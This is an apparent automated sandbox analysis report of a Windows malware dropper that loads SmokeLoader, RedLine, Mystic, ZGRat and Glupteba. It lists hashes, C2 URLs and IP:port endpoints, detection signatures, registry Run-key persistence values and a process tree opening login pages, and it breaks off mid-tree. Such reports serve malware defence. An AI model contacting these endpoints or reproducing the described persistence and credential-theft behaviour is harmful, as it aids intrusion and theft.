glupteba | 069b2d4d07b59164f9181fd79b9746f9f130750b71d6d640e65733b444e504ef

Analysis

max time kernel
142s
max time network
190s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
17-11-2023 18:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEAS.dc4d096240469c6266617e7fddfcf7d0.exe
Size

1003KB
MD5

dc4d096240469c6266617e7fddfcf7d0
SHA1

5f6a86c34f8a053e3f9a2aabefb566a895574fc1
SHA256

069b2d4d07b59164f9181fd79b9746f9f130750b71d6d640e65733b444e504ef
SHA512

5fb26cb7c56543e46fb18c1fb1fc4aef4b862ab45d8b2b543eceb5e2370a98b5a94bfb4e5b4d2ea669235ccb1ada1f54124b3ccafb3d123ee9efd9676cfedd78
SSDEEP

24576:1ylKgvdIT118ADdae1Is5CEGTokDTBA822xP7ZbEkWCEM+7T:QcgvdIT11JYe2SNGFRR1tb1WLx

Malware Config

Extracted

Family

smokeloader

Version

2022

http://5.42.92.190/fks/index.php

rc4.i32

Extracted

Family

redline

Botnet

taiga

5.42.92.51:19057

Extracted

Family

redline

Botnet

pixelfresh

194.49.94.11:80

Extracted

Family

redline

Botnet

@ytlogsbot

194.169.175.235:42691

Extracted

Family

smokeloader

Botnet

up3

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Signatures

Detect Mystic stealer payload 4 IoCs

resource	yara_rule
behavioral1/memory/6596-196-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/6596-197-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/6596-183-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/6596-220-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family

Detect ZGRat V1 6 IoCs

resource	yara_rule
behavioral1/memory/3520-1081-0x0000000004F80000-0x0000000004FCA000-memory.dmp	family_zgrat_v1
behavioral1/memory/3520-1084-0x0000000004F80000-0x0000000004FCA000-memory.dmp	family_zgrat_v1
behavioral1/memory/3520-1087-0x0000000004F80000-0x0000000004FCA000-memory.dmp	family_zgrat_v1
behavioral1/memory/3520-1090-0x0000000004F80000-0x0000000004FCA000-memory.dmp	family_zgrat_v1
behavioral1/memory/3520-1097-0x0000000004F80000-0x0000000004FCA000-memory.dmp	family_zgrat_v1
behavioral1/memory/3520-1100-0x0000000004F80000-0x0000000004FCA000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 9 IoCs

resource	yara_rule
behavioral1/memory/7212-852-0x0000000002D90000-0x000000000367B000-memory.dmp	family_glupteba
behavioral1/memory/7212-853-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/7212-880-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/7212-904-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/7212-936-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/7212-948-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/7212-970-0x0000000002D90000-0x000000000367B000-memory.dmp	family_glupteba
behavioral1/memory/7212-989-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/7212-1067-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Mystic
Mystic is an infostealer written in C++.
stealer mystic
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 12 IoCs

resource	yara_rule
behavioral1/memory/3460-289-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline
behavioral1/memory/4528-539-0x0000000000510000-0x000000000052E000-memory.dmp	family_redline
behavioral1/memory/1180-574-0x00000000001C0000-0x00000000001FE000-memory.dmp	family_redline
behavioral1/memory/1180-575-0x0000000000400000-0x0000000000449000-memory.dmp	family_redline
behavioral1/memory/8036-581-0x00000000005A0000-0x00000000005FA000-memory.dmp	family_redline
behavioral1/memory/8036-580-0x0000000000400000-0x0000000000470000-memory.dmp	family_redline
behavioral1/memory/3520-1081-0x0000000004F80000-0x0000000004FCA000-memory.dmp	family_redline
behavioral1/memory/3520-1084-0x0000000004F80000-0x0000000004FCA000-memory.dmp	family_redline
behavioral1/memory/3520-1087-0x0000000004F80000-0x0000000004FCA000-memory.dmp	family_redline
behavioral1/memory/3520-1090-0x0000000004F80000-0x0000000004FCA000-memory.dmp	family_redline
behavioral1/memory/3520-1097-0x0000000004F80000-0x0000000004FCA000-memory.dmp	family_redline
behavioral1/memory/3520-1100-0x0000000004F80000-0x0000000004FCA000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral1/memory/4528-539-0x0000000000510000-0x000000000052E000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 8012 created 3344	8012	latestX.exe	43
PID 8012 created 3344	8012	latestX.exe	43
PID 8012 created 3344	8012	latestX.exe	43
PID 8012 created 3344	8012	latestX.exe	43
PID 8012 created 3344	8012	latestX.exe	43

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
7500	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

.NET Reactor proctector 6 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/3520-1081-0x0000000004F80000-0x0000000004FCA000-memory.dmp	net_reactor
behavioral1/memory/3520-1084-0x0000000004F80000-0x0000000004FCA000-memory.dmp	net_reactor
behavioral1/memory/3520-1087-0x0000000004F80000-0x0000000004FCA000-memory.dmp	net_reactor
behavioral1/memory/3520-1090-0x0000000004F80000-0x0000000004FCA000-memory.dmp	net_reactor
behavioral1/memory/3520-1097-0x0000000004F80000-0x0000000004FCA000-memory.dmp	net_reactor
behavioral1/memory/3520-1100-0x0000000004F80000-0x0000000004FCA000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation	BA62.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation	DFBF.exe

Executes dropped EXE 19 IoCs

pid	Process
1384	Vc0Se79.exe
964	pG1UY25.exe
3592	1Xq08sN0.exe
6264	2Fr1634.exe
7876	7Lf85jM.exe
5372	8mM638Nu.exe
5700	BA62.exe
4528	D6E4.exe
7860	InstallSetup5.exe
1180	DA40.exe
6820	toolspub2.exe
6116	Broom.exe
7212	31839b57a4f11171d6abc8bbc4451ee4.exe
8036	DFBF.exe
8012	latestX.exe
1356	toolspub2.exe
552	659A.exe
6824	updater.exe
5708	31839b57a4f11171d6abc8bbc4451ee4.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	NEAS.dc4d096240469c6266617e7fddfcf7d0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	Vc0Se79.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	pG1UY25.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0007000000022df3-19.dat	autoit_exe
behavioral1/files/0x0007000000022df3-20.dat	autoit_exe

Detected potential entity reuse from brand paypal.
phishing paypal

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 6264 set thread context of 6596	6264	2Fr1634.exe	141
PID 5372 set thread context of 3460	5372	8mM638Nu.exe	160
PID 6820 set thread context of 1356	6820	toolspub2.exe	185
PID 552 set thread context of 2888	552	659A.exe	228

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	latestX.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4276	sc.exe
8164	sc.exe
7380	sc.exe
6228	sc.exe
2496	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
7908	6596	WerFault.exe	141

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	7Lf85jM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	7Lf85jM.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	7Lf85jM.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5448	msedge.exe
5448	msedge.exe
5512	msedge.exe
5512	msedge.exe
5468	msedge.exe
5468	msedge.exe
5616	msedge.exe
5616	msedge.exe
1192	msedge.exe
1192	msedge.exe
6408	msedge.exe
6408	msedge.exe
5416	msedge.exe
5416	msedge.exe
6336	msedge.exe
6336	msedge.exe
6752	msedge.exe
6752	msedge.exe
7876	7Lf85jM.exe
7876	7Lf85jM.exe
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE
3344	Explorer.EXE

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
7876	7Lf85jM.exe
1356	toolspub2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 25 IoCs

pid	Process
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeDebugPrivilege	4528	D6E4.exe
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeDebugPrivilege	8036	DFBF.exe
Token: SeDebugPrivilege	1180	DA40.exe
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	3344	Explorer.EXE

Suspicious use of FindShellTrayWindow 58 IoCs

pid	Process
3592	1Xq08sN0.exe
3592	1Xq08sN0.exe
3592	1Xq08sN0.exe
3592	1Xq08sN0.exe
3592	1Xq08sN0.exe
3592	1Xq08sN0.exe
3592	1Xq08sN0.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
3592	1Xq08sN0.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe

Suspicious use of SendNotifyMessage 56 IoCs

pid	Process
3592	1Xq08sN0.exe
3592	1Xq08sN0.exe
3592	1Xq08sN0.exe
3592	1Xq08sN0.exe
3592	1Xq08sN0.exe
3592	1Xq08sN0.exe
3592	1Xq08sN0.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
3592	1Xq08sN0.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
1192	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe
3500	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
6116	Broom.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 808 wrote to memory of 1384	808	NEAS.dc4d096240469c6266617e7fddfcf7d0.exe	87
PID 808 wrote to memory of 1384	808	NEAS.dc4d096240469c6266617e7fddfcf7d0.exe	87
PID 808 wrote to memory of 1384	808	NEAS.dc4d096240469c6266617e7fddfcf7d0.exe	87
PID 1384 wrote to memory of 964	1384	Vc0Se79.exe	88
PID 1384 wrote to memory of 964	1384	Vc0Se79.exe	88
PID 1384 wrote to memory of 964	1384	Vc0Se79.exe	88
PID 964 wrote to memory of 3592	964	pG1UY25.exe	90
PID 964 wrote to memory of 3592	964	pG1UY25.exe	90
PID 964 wrote to memory of 3592	964	pG1UY25.exe	90
PID 3592 wrote to memory of 8	3592	1Xq08sN0.exe	92
PID 3592 wrote to memory of 8	3592	1Xq08sN0.exe	92
PID 3592 wrote to memory of 2836	3592	1Xq08sN0.exe	94
PID 3592 wrote to memory of 2836	3592	1Xq08sN0.exe	94
PID 8 wrote to memory of 1440	8	msedge.exe	95
PID 8 wrote to memory of 1440	8	msedge.exe	95
PID 3592 wrote to memory of 1192	3592	1Xq08sN0.exe	97
PID 3592 wrote to memory of 1192	3592	1Xq08sN0.exe	97
PID 2836 wrote to memory of 2432	2836	msedge.exe	96
PID 2836 wrote to memory of 2432	2836	msedge.exe	96
PID 1192 wrote to memory of 2804	1192	msedge.exe	98
PID 1192 wrote to memory of 2804	1192	msedge.exe	98
PID 3592 wrote to memory of 4464	3592	1Xq08sN0.exe	99
PID 3592 wrote to memory of 4464	3592	1Xq08sN0.exe	99
PID 4464 wrote to memory of 908	4464	msedge.exe	101
PID 4464 wrote to memory of 908	4464	msedge.exe	101
PID 3592 wrote to memory of 4588	3592	1Xq08sN0.exe	102
PID 3592 wrote to memory of 4588	3592	1Xq08sN0.exe	102
PID 4588 wrote to memory of 4844	4588	msedge.exe	103
PID 4588 wrote to memory of 4844	4588	msedge.exe	103
PID 3592 wrote to memory of 404	3592	1Xq08sN0.exe	104
PID 3592 wrote to memory of 404	3592	1Xq08sN0.exe	104
PID 404 wrote to memory of 4576	404	msedge.exe	105
PID 404 wrote to memory of 4576	404	msedge.exe	105
PID 3592 wrote to memory of 1852	3592	1Xq08sN0.exe	106
PID 3592 wrote to memory of 1852	3592	1Xq08sN0.exe	106
PID 1852 wrote to memory of 1012	1852	msedge.exe	107
PID 1852 wrote to memory of 1012	1852	msedge.exe	107
PID 3592 wrote to memory of 4284	3592	1Xq08sN0.exe	108
PID 3592 wrote to memory of 4284	3592	1Xq08sN0.exe	108
PID 4284 wrote to memory of 2108	4284	msedge.exe	109
PID 4284 wrote to memory of 2108	4284	msedge.exe	109
PID 3592 wrote to memory of 3672	3592	1Xq08sN0.exe	110
PID 3592 wrote to memory of 3672	3592	1Xq08sN0.exe	110
PID 3672 wrote to memory of 1740	3672	msedge.exe	111
PID 3672 wrote to memory of 1740	3672	msedge.exe	111
PID 2836 wrote to memory of 5400	2836	msedge.exe	118
PID 2836 wrote to memory of 5400	2836	msedge.exe	118
PID 1192 wrote to memory of 5408	1192	msedge.exe	117
PID 1192 wrote to memory of 5408	1192	msedge.exe	117
PID 2836 wrote to memory of 5400	2836	msedge.exe	118
PID 2836 wrote to memory of 5400	2836	msedge.exe	118
PID 2836 wrote to memory of 5400	2836	msedge.exe	118
PID 1192 wrote to memory of 5408	1192	msedge.exe	117
PID 2836 wrote to memory of 5400	2836	msedge.exe	118
PID 2836 wrote to memory of 5400	2836	msedge.exe	118
PID 2836 wrote to memory of 5400	2836	msedge.exe	118
PID 2836 wrote to memory of 5400	2836	msedge.exe	118
PID 1192 wrote to memory of 5408	1192	msedge.exe	117
PID 2836 wrote to memory of 5400	2836	msedge.exe	118
PID 1192 wrote to memory of 5408	1192	msedge.exe	117
PID 2836 wrote to memory of 5400	2836	msedge.exe	118
PID 1192 wrote to memory of 5408	1192	msedge.exe	117
PID 1192 wrote to memory of 5408	1192	msedge.exe	117
PID 2836 wrote to memory of 5400	2836	msedge.exe	118

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\NEAS.dc4d096240469c6266617e7fddfcf7d0.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.dc4d096240469c6266617e7fddfcf7d0.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:808
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Vc0Se79.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Vc0Se79.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:1384
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG1UY25.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG1UY25.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:964
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Xq08sN0.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Xq08sN0.exe
      4⤵
      Executes dropped EXE
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:3592
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:8
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x174,0x178,0x17c,0x150,0x180,0x7ffec6ef46f8,0x7ffec6ef4708,0x7ffec6ef4718
        6⤵
        
        PID:1440
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,415961863390654850,16979188947164322306,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2008 /prefetch:2
        6⤵
        
        PID:5432
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,415961863390654850,16979188947164322306,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5468
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2836
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffec6ef46f8,0x7ffec6ef4708,0x7ffec6ef4718
        6⤵
        
        PID:2432
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,8214814055810349842,5474263535959216658,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5416
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
